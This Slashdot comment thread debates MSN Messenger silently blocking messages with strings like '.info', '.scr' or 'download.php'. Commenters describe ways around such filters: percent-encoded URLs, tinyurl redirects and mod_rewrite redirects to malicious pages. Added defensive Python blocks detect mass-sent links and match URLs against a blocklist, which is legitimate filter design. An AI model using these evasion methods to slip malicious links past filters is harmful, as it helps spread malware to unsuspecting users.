    Do you really think they're diverting resources away from fixing bugs so that they can add "censorship" features to IM? Perhaps this is just one effort among multiple efforts to correct problems AND mitigate their effects? If it's going to take X weeks to fix the bug, but Y days to implement a filter that will stop some large percentage of infections, don't you think that both avenues are worth exploration at the same time? There's more to slowing and preventing the spread of malware than fixing the defect that allows them to propagate.

    This also assumes that the same organization even owns the bug in question. Not all of these defects may be Microsoft's problem to begin with. This might even be a MORE reasonable action for them to take, since they're doing "everything in their power" to fight the problem rather than just sitting on their hands waiting for a 3rd-party to correct their bug, and sitting on their hands longer waiting for the end user to update their software.

    1. Re:Priorities and mitigation by RAMMS+EIN · · Score: 2, Interesting

      ``Do you really think they're diverting resources away from fixing bugs so that they can add "censorship" features to IM?''

      Yes.

      ``Perhaps this is just one effort among multiple efforts to correct problems AND mitigate their effects?''

      That sounds almost reasonable. Except that it implies that Microsoft actually makes a serious effort to fix the security holes they've saddled their users with. I had some hopes that, with Vista, they had actually started down that road, but these hopes have since been thoroughly dashed. Microsoft aren't and have never been serious about the security of their users.

      This is not part among "multiple efforts to correct problems AND mitigate their effects", this is a lame cop-out.

      ``If it's going to take X weeks to fix the bug, but Y days to implement a filter that will stop some large percentage of infections, don't you think that both avenues are worth exploration at the same time?''

      Yes, but that's not what's happening. What's happening is that Microsoft is censoring their IM service. I believe this is in a sincere effort to slow the spreading of malware over MSN, but that doesn't mean it's a Good Thing. For one thing, it also degrades the usability of the service for legitimate purposes. For another, it doesn't _actually_ stop the malware. What it does is erect some barrier. In that sense, it's not very different from the bazillions of "Are you sure?" dialogs that Microsoft software is full of. Except that these dialogs _could_ actually help educate users, if said users would bother to read and learn. Blocking certain messages just annoys legitimate users of the service. The filter will be bypassed. After that, everything is as it was, except less usable. And in the meantime, Microsoft introduces new security holes and lets other holes linger.

      Oh, and did you realize that this censoring (which really has been going on for months if not years now) can also be used as a stepping stone to censoring things that Microsoft considers harmful, even if the users would likely find them bona-fide? I've already had several of my messages blocked by the filters, and I assure you they did not in any way relate to malware. Perhaps a few cases of open-source software, though.

      ``There's more to slowing and preventing the spread of malware than fixing the defect that allows them to propagate.''

      Sure. And I do believe this is a sincere effort to protect MSN users. I just think the cure is worse than the disease.

      --
      Please correct me if I got my facts wrong.
    2. Re:Priorities and mitigation by SeaFox · · Score: 1

      Do you really think they're diverting resources away from fixing bugs so that they can add "censorship" features to IM?

      Is this a joke question? We're talking about Microsoft, the company that leaves security holes in their products for months on end while churning more DRM into it.
    3. Re:Priorities and mitigation by Fastolfe · · Score: 1

      For one thing, it also degrades the usability of the service for legitimate purposes. For another, it doesn't _actually_ stop the malware.

      Sure, it degrades the usability of the service somewhat. Just like "barrier" that is airport security degrades the usability of airline travel. It does, in fact, stop malware that uses that vector for propagation. Is it a permanent solution to the malware problem? Of course not. As you say, the people creating malware will adapt, and the "fix" would be ineffective against malware that infects through some other mechanism. But the point of my post was that this could be a short-term fix while a long-term solution is under development. It would completely eliminate the ability of this malware to spread while giving the company the necessary time to fix, test and deploy a solution without operating in "emergency mode" all the time.

      Yes, but that's not what's happening.

      And you know this.. how?

      I don't understand why people act as though the concept of a cost-benefit analysis is some strange or evil thing. Stop acting like a rabid anti-Microsoft troll for a moment and look at the problem rationally, from a business perspective. Businesses must be cost-effective in everything that they do. Pulling out all of the stops and blowing wads of cash all the time will put you out of business fast, and then where would your customers be?

      Oh, and did you realize that this censoring (which really has been going on for months if not years now) can also be used as a stepping stone to censoring things that Microsoft considers harmful, even if the users would likely find them bona-fide? I've already had several of my messages blocked by the filters, and I assure you they did not in any way relate to malware. Perhaps a few cases of open-source software, though.

      Conspiracy theory.

  15. With so many alternatives.. by bealzabobs_youruncle · · Score: 0, Offtopic

    why use MSN at all?

    1. Re:With so many alternatives.. by Anonymous Coward · · Score: 1, Insightful

      If I could choose, I would use only IRC and maybe Jabber if an IM-style protocol is absolutely needed. However, MSN is very popular around here and converting everyone I need to communicate with to the alternatives is just not possible.

      I don't need to use the official client, but sadly I must use some kind of program that connects to the MSN network now and then.

    2. Re:With so many alternatives.. by lordtoran · · Score: 1

      Because you cannot convince everyone you know to install a decent multi protocol messenger. Some less tech savvy folks in my contact list are too afraid to lay hands on their machine and will panically stick with whatever came on it preinstalled (in most cases, Windows with MSN Messenger). So I still have to keep that MSN account, although I strongly prefer Yahoo over it (for its great support in Kopete).

      --
      Want to hear the voice of GOD? cat /boot/vmlinuz > /dev/dsp
    3. Re:With so many alternatives.. by kwark · · Score: 1

      So use a jabber server that has transports to legacy networks.

      But since you like IRC you might have use for http://www.bitlbee.org/

    4. Re:With so many alternatives.. by Anonymous Coward · · Score: 0

      So use a jabber server that has transports to legacy networks.
      But since you like IRC you might have use for http://www.bitlbee.org/

      I'm aware of these possibilities, but in any case to communicate with the people using only MSN, I need to connect to the network one way or another. Yeah, I can do it indirectly through the methods you described, but I would still be using the MSN network in the end, I would still be affected with this censoring since it's a server side thing, and Microsoft would still be reading my messages ;)
    5. Re:With so many alternatives.. by kwark · · Score: 1

      But this way you can show the legacy IM users the power of your preferred method/client, including the backwards compatibility.

      Don't forget to tell your MSN users that you can't send anything confidential over that network (the last time I did some wireless sniffing MSN wasn't even encrypted, allowing me to spy on IMs (that was before the latest MSN live thingy though))

    6. Re:With so many alternatives.. by DarkVader · · Score: 1

      It's a legitimate question, not offtopic at all when you're talking about an IM service that is censoring user conversations.

      Somebody please mod parent up.

      I use iChat/AIM, iChat/Jabber and Yahoo - and I won't get a M$N account. I tell people that if they want to IM me they can use something other than M$N, as I won't be getting an account there.

  16. .INFO by tverbeek · · Score: 3, Insightful

    I don't suppose it's occurred to Microsoft that .info is a perfectly valid TLD used by a significant number of legitimate web sites, and a perfectly appropriate string to include in an IM discussion.

    --
    http://alternatives.rzero.com/
    1. Re:.INFO by SRA8 · · Score: 1

      Ah...no wonder these .info domains sell so cheap...!

    2. Re:.INFO by Anonymous Coward · · Score: 0

      I don't suppose it's occurred to Microsoft that .info is a perfectly valid TLD used by a significant number of legitimate web sites, and a perfectly appropriate string to include in an IM discussion.

      You are correct.

      However, legitimate .info domain names are extremely rare. So rare, that my antispam software tells me that the probability of an url containing a .info domain name being found in legitimate email is about 1%. An url containing .info is a pretty good indicator that a message is spam (yes, false positives & negatives will occur - I'm talking on average).

      Now, that's my email, yours may differ.

      I suspect the reason may have something to do with the very low price for .info domain names.

    3. Re:.INFO by beware1000 · · Score: 1

      I own three domains, a .net, .org and .info with three completely unrelated names.

      two out of three of them are blocked on msn.

    4. Re:.INFO by shish · · Score: 1

      .info is a perfectly valid TLD used by a significant number of legitimate web sites

      Since when o_O?

      --
      I mod down anyone who says "I will be modded down for this", regardless of the rest of their comment
    5. Re:.INFO by kyrio · · Score: 1

      Since three years ago.

    6. Re:.INFO by shish · · Score: 1

      Three years ago it became a perfectly valid TLD, but I would think that if it were "used by a significant number of legitimate web sites", chances are I would have seen *one* of them. As it is, the only time I've *ever* seen .info used is in spam emails and link farms.

      --
      I mod down anyone who says "I will be modded down for this", regardless of the rest of their comment
    7. Re:.INFO by kyrio · · Score: 1

      Look harder.

    8. Re:.INFO by shish · · Score: 1

      If I need to specifically go out and look for a non-spam .info, then they obviously aren't common :P

      --
      I mod down anyone who says "I will be modded down for this", regardless of the rest of their comment
  17. .com by Anonymous Coward · · Score: 2, Funny

    Do they block those scary executable .com files too?

  18. MSN does some weiiiiiird things... by jez9999 · · Score: 5, Interesting

    Here's one it started doing since the recent MS security drive. Any file that could possibly exploit a hole in any piece of software seems to be treated with serious suspicion. Somehow, this seems to include GIF files. So, when someone tried to send me a GIF file, I get this warning. I download it anyway, and it's sitting on my hard drive. I can copy it somewhere else, open it, etc.

    However - and this is the kicker - when I click on the blue link to the file in the MSN chat window, I get this dialog. Yeah, it actually DELETED the file I just downloaded. After I copied it using Explorer. And I have full access to it. Dunno who implemented that piece of genius.

    1. Re:MSN does some weiiiiiird things... by sentientbeing · · Score: 1

      That Microsoft crackden 'feature' is one big pain in the ass! Damn. The hassle I've had with that fucking policy. How do you turn it off?

      --

      ------
      beware he who would deny you access to information, for in his mind he dreams himself your master
    2. Re:MSN does some weiiiiiird things... by tepples · · Score: 2, Funny

      That Microsoft crackden 'feature' is one big pain in the ass! Damn. The hassle I've had with that fucking policy. How do you turn it off?

      One way is to install Ubuntu, but it's not for everyone.

    3. Re:MSN does some weiiiiiird things... by gardyloo · · Score: 2, Insightful

      Yep, that's astoundingly annoying. IIRC, you can do a "Save To..." instead of allowing MSN to choose where to save it. Then it doesn't get deleted.

    4. Re:MSN does some weiiiiiird things... by snillfisk · · Score: 1

      My MSN Messenger currently thinks that all MP3-files should be treated that way.. Quite ingenious the first time someone sent me some music they've made and voilà, all gone after the transfer (because we all know how fast MSN Messenger is at sending files)..

      This issue was brought to my attention a while back when they blocked _all_ links containing download.php. Yep. Not sure if they still do that, tho.

      --
      mats
      One man's ceiling is another man's floor.
    5. Re:MSN does some weiiiiiird things... by Pulse_Instance · · Score: 0, Troll

      You're a fucking tool, he didn't ask how do I get rid of Windows because of their numerous retarded practices he asked how to turn off a single feature in MSN. To install Ubuntu doesn't help him at all if you were to tell him to install other MSN protocol IM clients such as Pidgin, Trillian or something else then you could have moved them slowly towards open sourced software and made the switch go easier, not that I really would recommend Trillian and I haven't played with Pidgin yet. The best course of action however would have been to not click the reply button because your answer had absolutely no relevance to the question he was asking.

    6. Re:MSN does some weiiiiiird things... by Esteanil · · Score: 1

      The file isn't deleted until you press the "OK" button, so when you see that awful message you still have time to open explorer and copy/move the file.
      I'll leave the subject of how unbelievably retarded the whole thing is to others.

      --
      I'm a dreamer, the world is my playpen. But hey, I'm a serious person, I can't dream all the time.
    7. Re:MSN does some weiiiiiird things... by Grimbleton · · Score: 1

      Mr. Pot? I believe Mr. Kettle has some strong words for you.

    8. Re:MSN does some weiiiiiird things... by wica128 · · Score: 1

      For now you can not turn it off, but you can switch IM. gtalk is I think a good option

    9. Re:MSN does some weiiiiiird things... by SanityInAnarchy · · Score: 1

      Yes, they do. Just tested it.

      They don't just block the link, either -- they lag your connection for about 20 seconds, then kill the conversation. I'm not sure how it looks to a real MSN client, though.

      --
      Don't thank God, thank a doctor!
    10. Re:MSN does some weiiiiiird things... by SanityInAnarchy · · Score: 1

      First, punctuation is your friend it's really fucking annoying to read long sentences like this are you too fucking lazy to include a period and break it into multiple sentences or what fucking moron.

      That said:

      To install Ubuntu doesn't help him at all.

      Yes, that is a complete sentence. You put a period there. The first letter of the next word is capitalized. Go back to grade school and learn to fucking write.

      Anyway, I'd think that installing Ubuntu does help, as at that point, you're forced to find something like Pidgin -- I think Pidgin (or Gaim) might actually be included in the default install. I know Kopete is in the default Kubuntu install, and I find it a bit better -- it has webcam support, for one.

      Overkill? Yes, but it would work. Is your way better? Maybe, but you chose to bitch at someone for suggesting Ubuntu, instead of replying directly to the person who had the problem.

      --
      Don't thank God, thank a doctor!
    11. Re:MSN does some weiiiiiird things... by dyftm · · Score: 1

      A real kick in the teeth is that method will delete MP3s, but not WMAs, which have much more potential to do harm (eg to open up a website of the attacker's choosing). Political decision? No way...

    12. Re:MSN does some weiiiiiird things... by tepples · · Score: 1

      he didn't ask how do I get rid of Windows because of their numerous retarded practices he asked how to turn off a single feature in MSN.

      I misunderstood whether he was complaining about the one feature or about the whole Windows mindset. In the case of complaining about one feature, Pidgin for Windows should do the trick. The advantage of Pidgin or other multi-protocol clients is that if you can get both you and your contacts on such a client, you can switch to Jabber protocol, which has no MSCensorship at all. It will also make things easier when you do decide to try L*n?x.

    13. Re:MSN does some weiiiiiird things... by MaXimillion · · Score: 1

      That is a real PITA, especially since it also applies to MP3 files. Luckily, the list of filetypes it blocks can be altered through registry, although I'll be damned if I can remember which key it was.

    14. Re:MSN does some weiiiiiird things... by Anonymous Coward · · Score: 0

      >Yeah, it actually DELETED the file I just downloaded.
      An especially painful case of this was when I transferred the latest BF2 full patch (1,5GB or so) to a buddy over MSN (in order to exploit the 100Mbps speed of the lan rather than the 10Mbps internet connection).

      umhuyk

    15. Re:MSN does some weiiiiiird things... by bcmm · · Score: 1

      I did this in both 2-person and group chats, with people who were using the official client. They see the other person ending the convo. In a group chat, every participant sees all the other participants leave at once.

      IIRC there are a few other fun blocked words, but I've forgotten them.

      --
      # cat /dev/mem | strings | grep -i llama
      Damn, my RAM is full of llamas.
  19. So... by Perseid · · Score: 1

    ...as a web developer I need to find a new IM service? Great move. :P

    1. Re:So... by ChakatSanddancer · · Score: 1

      Use yahoo. It interoperates with MSN for the few people unwilling to switch, but for most people, you don't have to worry about the spying.

    2. Re:So... by boarsai · · Score: 1

      The ASP extension has no issues associated... coincidence? Mayhaps they'd prefer you to code in something other than php... hrmmmmn. Yes, I am wearing a tin foil hat... why?

  20. And if they didnt by nurb432 · · Score: 2, Insightful

    The first person that got infected with something would bitch that Microsoft didn't do enough.

    Not that I'm fond of them either, but it seems they can't win either way these days.

    --
    ---- Booth was a patriot ----
    1. Re:And if they didnt by SanityInAnarchy · · Score: 1

      Well, it depends who they want to piss off.

      Personally, I'd much rather piss off the one moronic user by not protecting them from themself -- it's their fault anyway. In fact, this probably happened, which is probably why they added these "features" in the first place.

      Instead, they've chosen to piss off everyone who sends a URL with a php extension (webcomics, Bash quotes, etc come to mind), and everyone who knows about the issue.

      And for what?

      So that some clueless morons are protected from other clueless morons. So that you're protected from any virus/worm/"hacker" who doesn't know about tinyurl.com (or any of the numerous other ways around that filter).

      --
      Don't thank God, thank a doctor!
  21. Losing battle... by MalHavoc · · Score: 1

    It's pretty much impossible to block everything. If someone really wants to send you a link to something that will infect (or try to infect) your computer, there are tons of ways to do it. The tinyurl example has already been mentioned, but every single Apache server out there comes with things like mod_rewrite or Redirect directives that can send innocuous URLs to the intended malicious URL. In the case of mod_rewrite, you can do it without even changing what the browser displays, so users don't even know they evaded (or didn't, as the case may be) an infection attempt.

  22. At least they're doing something by Deathlizard · · Score: 4, Informative

    Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place

    At least they're trying something (albeit a weak approach) to stop automated scripts from sending viruses all over their chat protocol.

    When you work on 1000+ college student laptops, you learn a lot of things about software students use in general, and one of these things you learn is:

    1) AIM is a Virus downloading service disguised as a chat protocol.

    I know that AOL doesn't do this on purpose, but it is so easy to hack that it might as well be. It's great when a 12 year old downloads a virus that infects AIM thinking it was some game (probably from AIM, I might add), it sends "Hey check this out!" to his sister at the college containing an infected link or program, and the next thing you know you're running Aimfix and cleaning Zlob off 300 PCs.

    If Aim would simply filter out the bad traffic (and they should be able to know if a client is spamming the servers like crazy by heuristics alone) it would stop a lot of scams dead in their tracks.
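
The server-side heuristic suggested in the comment above, sketched as an added example (not code from the thread or from any IM provider): flag a sender who pushes the same URL to many distinct recipients within a short window. The log format, account names, window and threshold are all assumptions, and the sample traffic is constructed.

```python
import re
from collections import defaultdict, deque

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed sample traffic: (epoch seconds, sender, recipient, message text).
SAMPLE_LOG = (
    [(1000, "alice", "bob", "lunch? http://menu.example.org/today"),
     (1005, "alice", "carol", "lunch? http://menu.example.org/today")]
    # Infected account: the same link to six contacts within ten seconds.
    + [(2000 + 2 * i, "kid12", f"contact{i}",
        "Hey check this out! http://files.example.net/game")
       for i in range(6)]
    # A person sharing one link with five friends over forty minutes.
    + [(3000 + 600 * i, "dave", f"friend{i}",
        "new comic is up http://comics.example.org/today.php")
       for i in range(5)]
)


def find_fanout_senders(events, window=60, min_recipients=5):
    """Return {sender: url} for senders that delivered one URL to at least
    `min_recipients` distinct recipients within `window` seconds.

    The check keys on sending behaviour, not on what the URL looks like,
    so renaming or re-encoding the link does not change the outcome.
    """
    recent = defaultdict(deque)  # (sender, url) -> deque of (ts, recipient)
    flagged = {}
    for ts, sender, recipient, text in sorted(events):
        for raw_url in URL_RE.findall(text):
            url = raw_url.rstrip(".,!?)")  # drop trailing sentence punctuation
            queue = recent[(sender, url)]
            queue.append((ts, recipient))
            # Slide the window: forget deliveries older than `window` seconds.
            while queue and ts - queue[0][0] > window:
                queue.popleft()
            distinct = {rcpt for _, rcpt in queue}
            if len(distinct) >= min_recipients:
                flagged.setdefault(sender, url)
    return flagged


if __name__ == "__main__":
    for sender, url in find_fanout_senders(SAMPLE_LOG).items():
        print(f"rate-limit or quarantine {sender}: mass-sent {url}")
```

The threshold trades false positives (someone inviting a whole contact list to an event) against how many contacts a worm reaches before it is cut off, so it needs tuning against real traffic.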

    1. Re:At least they're doing something by BenoitRen · · Score: 1

      The same thing can be done to MSN. A couple weeks ago my brother alerted me to a new MSN virus that sends itself with the message "nude pics of my friend look!".

    2. Re:At least they're doing something by SanityInAnarchy · · Score: 1

      1) AIM is a Virus downloading service disguised as a chat protocol.

      I understand your frustration, but that's even more nonsensical a statement than "The Internet is for Porn!"

      If Aim would simply filter out the bad traffic (and they should be able to know if a client is spamming the servers like crazy by heuristics alone) it would stop a lot of scams dead in their tracks.

      And if that kid's sister is smart enough to be in college at all, she should know enough to be skeptical. For example, a quick reply of "What was that?" to the brother, who can then say "I didn't send you anything", and then they know what happened.

      What's more, don't work on 1000+ college student laptops without at the very least removing admin rights from the students. Or if the laptops belong to the students, make them pay for you to clean up after their messes, and they'll learn very quickly not to click on random crap sent to them via AIM.

      But if you really want to do it your way, convince everyone to use Jabber, and give them an official school Jabber account. Then you can do the filtering yourself.

      --
      Don't thank God, thank a doctor!
    3. Re:At least they're doing something by Anonymous Coward · · Score: 0

      And if that kid's sister is smart enough to be in college at all, she should know enough to be skeptical.

      You have a lot of faith in computer users don't you. Maybe you should read This Slashdot article.

      Simply put, If they can click it, they will.

    4. Re:At least they're doing something by SanityInAnarchy · · Score: 1

      Actually, I have no faith in computer users.

      I just don't think it should be IT's job to cover for them.

      I have no faith in chainsaw users, either.

      But if they cut off a finger, they get to go find a doctor and PAY to have it reattached. It doesn't suddenly become the chainsaw company's liability.

      Although in this society, it might well be; after all, there is a chainsaw with a warning label of "Keep away from hands and genitals." Or something to that effect. You have to seriously wonder -- did some moron cut off his balls, and then attempt to sue the chainsaw company?

      --
      Don't thank God, thank a doctor!
  23. Old news! by Stormx2 · · Score: 3, Informative

    This has been known about for years. Here's a digg posting from over a year ago...

    1. Re:Old news! by hax0r_this · · Score: 1

      It's been on the Wikipedia page about MSN for months anyway, maybe a year.

    2. Re:Old news! by Ilgaz · · Score: 1

      This has been known about for years. Here's a digg posting from over a year ago...

      The issue here is, why does a "Digg" kind of story make it into the YRO section of Slashdot?

      People on Slashdot were advocating disabling of executable attachments and not allowing them to be double clicked/run on Outlook Express or any kind of mail client. So, MSN people implemented basically same thing on their (yes, their) network for additional security against click happy people.

      Since when is sending people .exe, .scr files part of our rights? Even screensaver companies don't distribute their files via .scr extension, they pack them into zip files. I bet people actually needing to send an executable to their friends either ZIP or RAR them already.

      Dear Slashdot, stop racing with your "light" version. End this policy please.
    3. Re:Old news! by Stormx2 · · Score: 1

      Well, we aren't saying they didn't try. The method of catching scammers is just completely futile. If they really felt like catching people who send these viruses, etc, they'd keep a constantly updating list on the msn server. That would find more "bad" links while keeping genuine links.

  24. Office Communicator by pboyd2004 · · Score: 1

    .... does the same stuff. I try to send a coworker the name of an exe or a dll and it shoots back that my message could not be sent. So even in a closed corporate environment stuff like this happens. Of course there probably is a way to turn that off at the server side, but our IT department has better things to do like hunting down copies of WinRAR and sending us threatening emails because "WinZip is our corporate standard compression tool."

    1. Re:Office Communicator by Anonymous Coward · · Score: 0

      our IT department has better things to do like hunting down copies of WinRAR and sending us threatening emails because "WinZip is our corporate standard compression tool."

      So, what do you do when external vendors/customers send you .rar files? RAR is much less popular than .zip, but it does happen. Call up and annoy the IT department?

      If you wanted to be BOFH-ish, get someone to start sending all attachments in .rar format. After 50 support calls, and document all the time you are wasting due to IT policy, I'm sure a steering committee will start a focus group to allow the use of unrar.

  25. Devil's Advocate by MrNonchalant · · Score: 1

    It's probable that they're seeing a lot of automated traffic with these URLs. They know for sure that these are malicious networks and they're spreading on their IM client. Maybe they already patched the vulnerabilities, but these are people who have (apparently) not set auto update to work. Maybe they plan to fix it in the next roll-up but need a stopgap in the meantime. It's not hard to imagine an ethical scenario where you pretty much have to block that traffic. Now the question becomes how. I'm not sure I agree with the silent blocking or the indiscriminate targeting like .info, but the very fact that they're blocking known attack vectors I don't think is a bad idea.

  26. Might Be Time To Bring Back FIDONET by NeverVotedBush · · Score: 1

    I've about had it with Google's spying, Microsoft's spying/interference, Yahoo's spying, and pretty much everything and everyone else that is working to profile ad nauseam.

    1. Re:Might Be Time To Bring Back FIDONET by Anonymous Coward · · Score: 0

      You seem like a paranoid moron.

      Microsoft are doing this to provide what they claim is security. Really they are too lazy to fix the real bugs.

      Google and Yahoo! do their spying to provide better services.

      What do you think these multi million dollar companies are going to do? Blackmail you for searching for lesbian porn late at night one time?

    2. Re:Might Be Time To Bring Back FIDONET by Thomas+Shaddack · · Score: 1
      What do you think these multi million dollar companies are going to do? Blackmail you for searching for lesbian porn late at night one time?

      They will just give the logs relevant to you to any lawyer coming in with a subpoena. The lawyer then can blackmail you.

      With so many lawyers around, paranoia is circumspection.

  27. All the more reason to use Jabber/XMPP by MysticOne · · Score: 2, Informative

    You can set up your own server, you can control your own IM stuffs, and really ... it's just a better solution. You could still go with GTalk if you want access to the Jabber network without setting up a server or doing anything fancy, but in that case I'd recommend encryption for your conversations (you should probably do that anyway). If you just want to set up a new Jabber account on one of the public servers, head on over to jabber.org and pick one out.

    1. Re:All the more reason to use Jabber/XMPP by sploxx · · Score: 1

      Or a good old IRC server! Open and simple and non-XML-bullshit and everything :-)

    2. Re:All the more reason to use Jabber/XMPP by batkiwi · · Score: 1

      Have you looked at the raw IRC protocol? It's "wtf-bullshit," which may or may not be preferable to xml-bullshit, but I do know that XML-bullshit is at least easier to parse.

  28. Jabber by Anonymous Coward · · Score: 0

    I'd recommend Gajim in Gnome or Psi in KDE or Windows. The only real advantage to using Google Talk is that it enables voice calls to other Google Talk users but there's a summer of code project to get that in Gajim too and Psi is also getting this soon. Jabber is the future.

    1. Re:Jabber by Andrew+Kismet · · Score: 1

      Yes, and when Jabber updates, GTalk will update with it - faster, sleeker, and branded. Good luck.

  29. spying by hey · · Score: 1

    I wonder if MSN also spies on users. Do they have keywords in place to log messages related to possibly competing products, etc?

  30. Four ways to hide the .php extension by tepples · · Score: 5, Informative

    And what does every Linux web server come with?

    Perl.

    Still, the administrator of a server running PHP 5 can get scripts to run without having .php in the URL by using various forms of content negotiation:

    • With Options MultiViews, the client requests /download?foo=bar. Apache HTTP Server will look for a file called download, not find it, and then search for download.* and run the first thing it finds.
    • Type-mapped negotiation in Apache works much the same way, except it uses .var files (similar to Windows shortcuts) that point to your script. For instance, /download?foo=bar would reference /download.var, which points to /download.php. It's useful if you have a lot of small requests, for which the repeated directory scans performed by MultiViews might become CPU-bound.
    • Rename download.php to download/index.php, and Apache will find it when it scans index.* to display a default page for a directory.
    • Last but not least, mod_rewrite.
    1. Re:Four ways to hide the .php extension by Zonk+(troll) · · Score: 5, Informative

      Or, do it the way I do.

      1. Name the PHP file "download".
      2. Use this option either in httpd.conf or .htaccess:

      <Files /path/to/file/download>
      SetHandler application/x-httpd-php
      </Files>

      3. Access it like:
      http://localhost/download or accept arguments like http://localhost/download/file.odt

      If you want to get what comes after the slash, this is all you need:

      $thePath = explode("/",ereg_replace($_SERVER['SCRIPT_NAME']," ",$_SERVER['REQUEST_URI']));


      file.odt would be located in $thePath[1].

      --
      "The Federal Reserve is a fraudulent system."--Lew Rockwell
      End The FED. -
    2. Re:Four ways to hide the .php extension by Zonk+(troll) · · Score: 4, Informative

      $thePath = explode("/",ereg_replace($_SERVER['SCRIPT_NAME']," ",$_SERVER['REQUEST_URI']));

      There isn't supposed to be a space in the quotes. The lameness filter added that.

      --
      "The Federal Reserve is a fraudulent system."--Lew Rockwell
      End The FED. -
    3. Re:Four ways to hide the .php extension by Dragonslicer · · Score: 2, Interesting

      Still, the administrator of a server running PHP 5 can get scripts to run without having .php in the URL by using various forms of content negotiation:

      Another option is to use the AddType directive to have other file extensions run through the PHP interpreter. If you don't have any static pages on your site or can accept the minor performance hit, you can send all .html files through PHP.
    4. Re:Four ways to hide the .php extension by Hooded+One · · Score: 1

      As I recall, you can also set an arbitrary extension to be run through PHP in Apache, and just name all your php files that way. Hell, you can even tell it that .html files go through PHP, which might slow down regular HTML (which you can get around further by using .htm for one and .html for the other), but shouldn't cause any other problems.

  31. Or Fannie Mae? by tepples · · Score: 1

    How people NAMED Fanny deal with that, I can't imagine.

    As far as I can tell, they revert to their legal given name Frances. But then how do people discuss mortgages or chocolates without "Fannie"?
    1. Re:Or Fannie Mae? by Obsi · · Score: 0

      The same way supposed Nigerians who need to get money out of their country do -- by dealing with /dev/null!

  32. Oh please. by arcade · · Score: 2

    Anyone who knows me knows that I haven't used windows since 1999. I simply can't stand the system, nor can I stand the corporation behind it.

    However. I'm also interested in computer security.

    It _MAKES SENSE_ to block stuff that has been observed in automated worms. It's a simple solution. It's not something that will make all systems invulnerable - but it _MAKES SENSE_. It's a quickfix. A quickfix that works.

    This is only "censorship" insofar that it actually prevents stupid automated worms from spreading. It's a defensive measure. Not a perfect one, but one.

    Oh, and patching the holes. Sure. You can patch the holes. Then everyone has to update .. should we try to protect, or should we ignore those that do not upgrade their systems? The cynic in me tells me : "Let them be cracked". The humanitarian in me tells me: "Well, think of the victims of the DDOS attacks from the botnets of previously-vulnerable people".

    I'm dead tired of _idiots_ who think that any preventative measure is evil! censorship! bad!

    Microsoft is simply trying to help in this case. If you do not like it, use another IM service. Like Yahoo! .. or IRC for that matter. Heck. PLEASE go back to IRC. It's still the best means of communication there is.

    So, please you censorship-screaming morons:

    SHUT UP! STOP USING THEIR SERVICE IF YOU DO NOT LIKE IT. THEY ARE TRYING TO DO THE RIGHT THING IN THIS INSTANCE !

    *phew*. Now I have to go wash my brain. I've just defended satan.

    --
    "Rune Kristian Viken" - http://www.nwo.no - arca
    1. Re:Oh please. by Zaknafein500 · · Score: 1

      Generally speaking, I agree with you. Unfortunately, as has been demonstrated in the article, the filtering can be avoided by countless methods of obfuscation. Thus, it's not really accomplishing anything at all.

      --

      "The guide is definitive, reality is frequently inaccurate."
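
What the obfuscation point means for anyone maintaining such a filter, as an added example (not code from the thread or from MSN): matching after URL canonicalization closes the percent-encoding gap quoted at the top of this page, while shortened and extension-less URLs still pass, because no string match sees where a link finally leads. The blocklist holds only strings this page names; the real list and matching rules are not public, and the function names are hypothetical.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Strings this page names as blocked. The real server-side list and its
# matching rules are not public; this tuple is an assumption.
BLOCKED = (".scr", ".info", "download.php")

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def naive_is_blocked(message):
    """Plain substring match on the raw message text."""
    return any(s in message for s in BLOCKED)


def canonicalize(url):
    """Reduce a URL to one comparable form: lower-cased host, percent-decoded
    and dot-segment-normalized path, decoded query. Scheme and port are
    dropped because the blocklist does not depend on them."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = posixpath.normpath(unquote(parts.path)) if parts.path else "/"
    canon = host + path.lower()
    if parts.query:
        canon += "?" + unquote(parts.query).lower()
    return canon


def canonical_is_blocked(message):
    """Match the blocklist against the canonical form of every URL in the
    message, then fall back to the raw text for strings outside URLs."""
    for url in URL_RE.findall(message):
        canon = canonicalize(url)
        if any(s in canon for s in BLOCKED):
            return True
    return naive_is_blocked(message)


def compare(messages):
    """Return (message, naive verdict, canonical verdict) for each message."""
    return [(m, naive_is_blocked(m), canonical_is_blocked(m)) for m in messages]


# URLs taken from this page (the quoted article and the comments).
SAMPLES = [
    "http://evil.example.com/download.php",    # blocked by both
    "http://evil.example.com/down%6Coad.php",  # only the canonical match fires
    "http://tinyurl.com/z35a5",                # redirect: passes both
    "http://localhost/download/file.odt",      # extension-less script: passes both
]

if __name__ == "__main__":
    for message, naive, canon in compare(SAMPLES):
        print(f"naive={naive!s:5} canonical={canon!s:5} {message}")
```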
    2. Re:Oh please. by BenoitRen · · Score: 1

      PLEASE go back to IRC. It's still the best means of communication there is.

      If you like to see tons of users idling, sure.

    3. Re:Oh please. by jb.hl.com · · Score: 1

      It's accomplishing a fair amount by blocking some of the main MSN worms. If the messages of existing worms which contain specific phrases are blocked, then that stops in one move those existing worms from spreading in their current form. This is a good thing, if annoying if you have to send a legit URL...

      --
      By summer it was all gone...now shesmovedon. --
    4. Re:Oh please. by causality · · Score: 1

      It _MAKES SENSE_ to block stuff that has been observed in automated worms. It's a simple solution. It's not something that will make all systems invulnerable - but it _MAKES SENSE_. It's a quickfix. A quickfix that works.

      That's just the problem - too many "quickfixes" and not enough inherent security that was part of the design from day one.

      Oh, and patching the holes. Sure. You can patch the holes. Then everyone has to update .. should we try to protect, or should we ignore those that do not upgrade their systems? The cynic in me tells me : "Let them be cracked". The humanitarian in me tells me: "Well, think of the victims of the DDOS attacks from the botnets of previously-vulnerable people".

      I'm dead tired of _idiots_ who thinks that any preventative measure is evil! censorship! bad!

      Microsoft is simply trying to help in this case.

      This is needless tampering with network traffic and it's needless because these after-the-fact quickfixes are not the best way to deal with this problem. You have an operating system with associated applications that tend to execute untrusted content from unverifiable sources on an untrusted network, made worse by the fact that the users are not expected to educate themselves since that might not meet the "Easy to Use!" criteria. Of course this situation is going to be a neverending supply of vulnerabilities.

